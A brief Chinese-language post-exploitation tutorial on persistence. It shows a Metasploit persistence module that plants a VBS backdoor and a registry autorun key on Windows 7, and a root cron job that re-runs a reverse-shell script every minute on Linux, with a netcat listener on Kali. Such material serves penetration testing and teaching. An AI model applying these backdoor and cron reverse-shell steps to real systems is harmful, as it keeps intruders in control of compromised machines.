windows权限维持 注册表后门
首先拿到msf的shell后
background退出
use exploit/windows/local/persistence
设置会话
然后运行
win7 已经生成vbs后门
注册表也被修改了
回到kali的msf中
将windows7重新启动
开机成功后 注册表后门会自动运行
win7 成功上线
linux权限维持 计划任务反弹shell
创建反弹shell脚本,vim shell.sh
里面的 ip和端口号要和攻击机对应
并更改文件权限,使得文件可以被执行
添加计划任务
设置反弹shell任务每分钟执行一次
*/1 * * * * root /root/Desktop/shell.sh
kali使用nc启动监听